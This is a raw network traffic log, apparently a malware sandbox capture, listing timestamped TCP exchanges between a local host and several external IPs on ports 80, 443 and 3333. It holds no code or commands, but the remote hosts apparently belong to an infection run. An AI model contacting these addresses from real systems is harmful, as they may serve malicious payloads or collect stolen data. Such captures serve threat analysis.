                                                                                                                                                                                              Dec 16, 2024 01:01:28.891944885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.891990900 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.892117023 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.892239094 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.892746925 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.892883062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.892930984 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.893682003 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.893727064 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.893779993 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.894452095 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.894496918 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.894568920 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.894609928 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.895267010 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.895391941 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.895441055 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.896148920 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.896193981 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.896239996 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.896279097 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.896989107 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.897097111 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.897166014 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.897847891 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.897928953 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.897981882 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.898646116 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.898766041 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.898817062 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.899499893 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.899553061 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.899599075 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.899787903 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.900415897 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.900475979 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.900506020 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.900547981 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.901163101 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.901268005 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.901401043 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.902013063 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.902070045 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.902108908 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.902859926 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.902913094 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.902959108 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.903728962 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.903781891 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.903811932 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.904517889 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.904568911 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.904594898 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.904881954 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.905364990 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.905450106 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.905478954 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.905766010 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.906202078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.906311989 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.906492949 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.907037020 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.907111883 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.907160044 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.907891989 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.907943964 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.907988071 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.908046961 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.908708096 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.908760071 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.908809900 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.908849955 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:28.909559965 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.909641981 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:28.909693003 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.003196955 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.003247023 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.003267050 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.003285885 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.003704071 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.003730059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.003755093 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.003784895 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.004470110 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.004513979 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.004563093 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.005137920 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.005618095 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.060930967 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.060971975 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.061028957 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.061347961 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.061441898 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.061599016 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.062151909 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.062201023 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.062297106 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.062344074 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.062988043 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.063271046 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.063328981 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.063380957 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.063489914 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.064110994 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.064158916 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.064254999 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.064304113 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.064971924 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.065170050 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.065174103 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.065217018 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.065829992 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.065885067 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.066026926 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.066270113 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.066625118 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.066674948 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.066749096 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.066823006 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.067504883 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.067554951 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.067595959 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.067637920 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.068315029 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.068361998 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.068408966 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.068454027 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.069145918 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.069242954 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.069297075 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.070019960 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.070065975 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.070171118 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.070215940 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.070817947 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.070868015 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.070962906 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.071008921 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.071664095 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.071712017 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.071811914 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.071891069 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.072510004 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.072561979 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.072951078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.072999954 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.073344946 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.073391914 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.073451996 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.073496103 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.074156046 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.074278116 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.074330091 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.074992895 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.075045109 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.075192928 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.075236082 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.075853109 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.075965881 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.075977087 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.076056004 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.076751947 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.076802015 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:29.076858044 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:29.076900959 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:31.538296938 CET4979480192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:31.538539886 CET4982580192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:31.658646107 CET8049825185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:31.659034014 CET4982580192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:31.659153938 CET8049794185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:31.659221888 CET4979480192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:31.673388958 CET4982580192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:31.793433905 CET8049825185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:32.148219109 CET498273333192.168.2.437.203.243.102
                                                                                                                                                                                              Dec 16, 2024 01:01:32.268387079 CET33334982737.203.243.102192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:32.268467903 CET498273333192.168.2.437.203.243.102
                                                                                                                                                                                              Dec 16, 2024 01:01:32.269124985 CET498273333192.168.2.437.203.243.102
                                                                                                                                                                                              Dec 16, 2024 01:01:32.389101982 CET33334982737.203.243.102192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:32.510962009 CET49828443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:32.510988951 CET44349828154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:32.511046886 CET49828443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:32.522861958 CET49828443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:32.522874117 CET44349828154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:33.001277924 CET8049825185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:33.001691103 CET4982580192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:33.014015913 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:33.014019012 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:33.134413958 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:33.134437084 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:33.134501934 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:33.134505033 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:33.135123014 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:33.255055904 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:33.630858898 CET33334982737.203.243.102192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:33.630912066 CET33334982737.203.243.102192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:33.631004095 CET498273333192.168.2.437.203.243.102
                                                                                                                                                                                              Dec 16, 2024 01:01:34.050209999 CET44349828154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.051307917 CET49828443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:34.051331997 CET44349828154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.052844048 CET44349828154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.052895069 CET49828443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:34.058653116 CET49828443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:34.058762074 CET44349828154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.058837891 CET49828443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:34.058844090 CET44349828154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.100567102 CET49828443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:34.556935072 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557024002 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557061911 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557090998 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557136059 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557295084 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557353020 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557399988 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557405949 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557447910 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557450056 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557491064 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557912111 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557948112 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557984114 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557988882 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.557988882 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.558032990 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.595927000 CET44349828154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.596098900 CET44349828154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.596170902 CET49828443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:34.610132933 CET49828443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:34.610152006 CET44349828154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.677162886 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.677256107 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.677311897 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.693758011 CET498273333192.168.2.437.203.243.102
                                                                                                                                                                                              Dec 16, 2024 01:01:34.693780899 CET498273333192.168.2.437.203.243.102
                                                                                                                                                                                              Dec 16, 2024 01:01:34.723484993 CET49835443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:34.723568916 CET44349835154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.723651886 CET49835443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:34.735677958 CET49835443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:34.735713005 CET44349835154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.748990059 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.749042034 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.749104977 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.749104977 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.752968073 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.753021002 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.753113985 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.753163099 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.762491941 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.762510061 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.762541056 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.762562990 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.770864964 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.770972967 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.771044970 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.771193027 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.779146910 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.779239893 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.779369116 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.779411077 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.786685944 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.786744118 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.786788940 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.786828995 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.795108080 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.795183897 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.795238972 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.803572893 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.803675890 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.803725004 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.811959982 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.812045097 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.812107086 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.812185049 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.820436001 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.820492983 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.820540905 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.820588112 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.828871965 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.828927040 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.828979969 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.940637112 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.940697908 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.940746069 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.943058014 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.943106890 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.944031000 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.944070101 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.944149971 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.944348097 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.949022055 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.949161053 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:34.949186087 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:34.949203968 CET4982980192.168.2.431.41.244.11
